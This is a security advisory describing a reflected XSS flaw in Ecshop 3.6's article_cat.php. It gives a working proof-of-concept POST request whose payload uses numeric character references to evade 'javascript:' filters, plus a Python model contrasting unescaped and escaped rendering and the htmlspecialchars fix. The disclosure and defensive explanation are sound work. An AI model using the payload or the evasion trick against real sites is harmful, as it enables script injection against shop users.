Summary
Ecshop 3.6 is susceptible to a reflected XSS attack.
The flaw exists because user-supplied input is concatenated, without filtering or escaping, into the HTML form elements the page builds. An attacker can close the attribute the value is placed in, inject their own markup, and have the victim's browser execute attacker-controlled script.
Details
In ecshop/article_cat.php, the value of $_POST['cur_url'] is assigned to $search_url without any filtering or escaping.
In ecshop/temp/compiled/article_cat.dwt.php, $search_url is concatenated directly into the HTML output, so whatever the request body contains is reflected back into the page unescaped. Because the value is rendered in the victim's browser with the attacker's markup intact, this is a reflected XSS vulnerability.
Proof of Concept (POC)
POST /article_cat.php?id=1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 146
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: 192.168.160.158:1042
Connection: Keep-alive
cur_url=http://www.example.com">%3ca%20href%3dj%26%2397v%26%2397script%26%23x3A%3b%26%2397lert(1)%3eClickMe<!--&id=1&keywords=1
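The request above works in three steps: the leading `"` and `>` close the double-quoted attribute and the tag the value sits in, the injected `<a href=...>` uses HTML numeric character references (`j&#97v&#97script&#x3A;...`) so that a filter looking for the literal string `javascript:` never sees it while the browser still decodes the href to `javascript:alert(1)`, and the trailing `<!--` comments out the remainder of the original tag so the page still parses. The following Python is an added example that models this, not code from the Ecshop project: it decodes the POC body the way PHP fills $_POST, renders it through an assumed template shape (a double-quoted attribute of a form element, which is what the POC relies on; the real compiled template is not reproduced here), shows the decoded href the victim's browser would get, and then renders the same value through an attribute-escaped version. The markup, function names and `run_poc` helper are illustrative assumptions.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed copy of the POC request body from this advisory (the
# application/x-www-form-urlencoded body of the POST to /article_cat.php?id=1).
POC_BODY = (
    'cur_url=http://www.example.com">%3ca%20href%3dj%26%2397v%26%2397script'
    '%26%23x3A%3b%26%2397lert(1)%3eClickMe<!--&id=1&keywords=1'
)


def parse_form_body(body: str) -> dict:
    """Decode a form body the way PHP populates $_POST: split on '&', then
    percent-decode each field (for a repeated key the last value wins)."""
    return {k: v[-1] for k, v in parse_qs(body, keep_blank_values=True).items()}


def vulnerable_render(search_url: str) -> str:
    """Assumed shape of the compiled article_cat template: the value lands inside
    a double-quoted attribute of a form element with no escaping at all.
    (Illustrative markup, not the project's actual template.)"""
    return (
        '<form action="article_cat.php" method="post">'
        f'<input type="hidden" name="cur_url" value="{search_url}">'
        '<input type="submit" value="Search"></form>'
    )


def safe_render(search_url: str) -> str:
    """Hardened version of the same markup: escape for an attribute context.
    quote=True turns the '"' that the payload uses to close the attribute into
    &quot;, and '<', '>' and '&' become entities, so neither a new tag nor a
    character reference of the attacker's survives into the output."""
    escaped = html.escape(search_url, quote=True)
    return (
        '<form action="article_cat.php" method="post">'
        f'<input type="hidden" name="cur_url" value="{escaped}">'
        '<input type="submit" value="Search"></form>'
    )


def injected_href(rendered: str):
    """Return the href of the first <a> tag in the rendered markup, with HTML
    character references decoded the way a browser decodes attribute values
    (numeric references are honoured even without a trailing ';').
    Returns None when the markup contains no <a> tag at all."""
    m = re.search(r'<a\s+href=([^\s>]+)', rendered)
    return html.unescape(m.group(1)) if m else None


def run_poc() -> dict:
    """Drive the POC body through both renderers and report what a victim would get."""
    fields = parse_form_body(POC_BODY)
    cur_url = fields['cur_url']
    vuln_page = vulnerable_render(cur_url)
    safe_page = safe_render(cur_url)
    return {
        'cur_url': cur_url,
        'vulnerable_href': injected_href(vuln_page),  # 'javascript:alert(1)'
        'safe_href': injected_href(safe_page),        # None: no tag was injected
        'safe_page': safe_page,
    }


if __name__ == '__main__':
    result = run_poc()
    print('decoded cur_url     :', result['cur_url'])
    print('link the victim gets:', result['vulnerable_href'])
    print('after escaping      :', result['safe_href'])
```

The point of `injected_href` is that the bypass lives in the browser's attribute parsing, not in the server: no blocklist on the input side ("javascript:", "<script", and so on) is a reliable fix, because the encoded form does not contain those strings. The fix is contextual output escaping; in PHP that is `htmlspecialchars($search_url, ENT_QUOTES, 'UTF-8')` at the point where the template emits the value, which produces the same result `safe_render` shows.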